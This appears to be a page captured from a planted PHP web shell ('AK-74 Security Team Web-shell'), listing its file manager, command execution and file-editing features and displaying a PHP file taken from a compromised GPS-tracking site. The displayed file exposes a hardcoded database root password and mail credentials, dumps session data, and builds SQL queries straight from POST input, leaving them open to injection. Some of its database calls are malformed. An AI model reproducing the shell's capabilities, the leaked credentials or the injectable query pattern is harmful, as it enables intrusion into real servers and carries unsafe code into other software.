.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php session_start(); include ('../init.php'); include ('../func/fn_common.php'); checkUserSession(); loadLanguage($gsValues['LANGUAGE']); echo '<pre>'; print_r($_SESSION); echo '</pre>'; $cookie_name = $_SESSION['username']; $cookie_value = $_SESSION['username']; setcookie($cookie_name, $cookie_value, time() + (86400 * 30), "/"); // 86400 = 1 day $con = mysqli_connect("localhost", "root", "4c>5:kxUd8YN8,LK", "gs"); $_POST['name'] = substr($_POST['name'], 0, 6); if ($_POST['name'] == 'notice') { $id = $_POST['pk']; $notice = $_POST['value']; $result = mysqli_query($con, "SELECT COUNT(*) as count FROM gs_objects WHERE imei=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); $q = "UPDATE `gs_users` SET `user_flag`='0', `admin_flag`='1' WHERE (`username`='" . $_SESSION['username'] . "')"; if ($count[0] == 0) { mysqli_query($con, "INSERT INTO gs_objects(imei,notice) VALUES('" . $id . "','" . $notice . "')") or die(mysqli_error()); mysqli_query($con, $q); } else { mysqli_query($con, "UPDATE gs_objects SET notice='" . $notice . "' WHERE imei=$id") or die(mysqli_error()); mysqli_query($con, $q); } } function sendnotification() { date_default_timezone_set('Etc/UTC'); require 'PHPMailerAutoload.php'; $mail = new PHPMailer; //Tell PHPMailer to use SMTP $mail->isSMTP(); //Enable SMTP debugging // 0 = off (for production use) // 1 = client messages // 2 = client and server messages $mail->SMTPDebug = 2; //Ask for HTML-friendly debug output $mail->Debugoutput = 'html'; //Set the hostname of the mail server $mail->Host = "mail.henditech.com"; //Set the SMTP port number - likely to be 25, 465 or 587 $mail->Port = 25; //Whether to use SMTP authentication $mail->SMTPAuth = true; //Username to use for SMTP authentication $mail->Username = "event@henditech.com"; //Password to use for SMTP authentication $mail->Password = "123@321"; //Set who the message is to be sent from $mail->setFrom('event@henditech.com', 'henditech'); //Set an alternative reply-to address $mail->addReplyTo('support@henditech.com', 'henditech'); //Set who the message is to be sent to $maillists = array('support@henditech.com', 'agohary@henditech.com'); foreach ($maillists as $maillist) { $mail->addAddress($maillist,$maillist); //$mail->addAddress('support@henditech.com', 'support'); //Set the subject line $mail->Subject = 'check report from ' . $_SESSION['username']; //Read an HTML message body from an external file, convert referenced images to embedded, //convert HTML into a basic plain-text alternative body $mail->msgHTML('check report from client : ' . $_SESSION['username']); //Replace the plain text body with one created manually $mail->AltBody = ''; //Attach an image file //$mail->addAttachment('images/phpmailer_mini.png'); //send the message, check for errors if (!$mail->send()) { echo "Mailer Error: " . $mail->ErrorInfo; } else { $_SESSION["send"] = "green"; } } } if ($_POST['name'] == 'status') { $id = $_POST['pk']; $status = $_POST['value']; $result = mysqli_query($con, "SELECT COUNT(*) as count FROM gs_objects WHERE imei=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); $q = "UPDATE `gs_users` SET `user_flag`='1', `admin_flag`='0' WHERE (`username`='" . $_SESSION['username'] . "')"; if ($count[0] == 0) { mysqli_query($con, "INSERT INTO gs_objects(imei,status) VALUES('" . $id . "','" . $status . "')") or die(mysqli_error()); mysqli_query($con, $q); } else { mysqli_query($con, "UPDATE gs_objects SET status='" . $status . "' WHERE imei=$id") or die(mysqli_error()); mysqli_query($con, $q); } } if ($_POST['name'] == 'comments') { $id = $_POST['pk']; $comments = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,comments) VALUES('" . $id . "','" . $comments . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET comments='" . $comments . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'country') { $id = $_POST['pk']; $country = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,country_name) VALUES('" . $id . "','" . $country . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET country_name='" . $country . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'dob') { $id = $_POST['pk']; $dob = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,dob) VALUES('" . $id . "','" . $dob . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET dob='" . $dob . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'appt') { $id = $_POST['pk']; $appt = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,appt) VALUES('" . $id . "','" . $appt . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET appt='" . $appt . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'combo') { $id = $_POST['pk']; $combo = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,combo_appt) VALUES('" . $id . "','" . $combo . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET combo_appt='" . $combo . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'email') { $id = $_POST['pk']; $email = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,email) VALUES('" . $id . "','" . $email . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET email='" . $email . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'options') { $id = $_POST['pk']; $options = $_POST['value']; $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,options) VALUES('" . $id . "','" . $options . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET options='" . $options . "' WHERE id=$id") or die(mysqli_error()); } } if ($_POST['name'] == 'wy') { $id = $_POST['pk']; $text = htmlspecialchars($_POST['value']); $result = mysqli_query("SELECT COUNT(*) as count FROM sample WHERE id=$id") or die(mysqli_error()); $count = mysqli_fetch_row($result); if ($count[0] == 0) { mysqli_query("INSERT INTO sample(id,wy_text) VALUES('" . $id . "','" . $text . "')") or die(mysqli_error()); } else { mysqli_query("UPDATE sample SET wy_text='" . $text . "' WHERE id=$id") or die(mysqli_error()); } } ?>
Rename:
-